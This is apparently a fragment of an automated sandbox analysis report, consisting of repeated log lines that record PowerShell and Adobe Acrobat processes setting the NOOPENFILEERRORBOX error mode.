              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
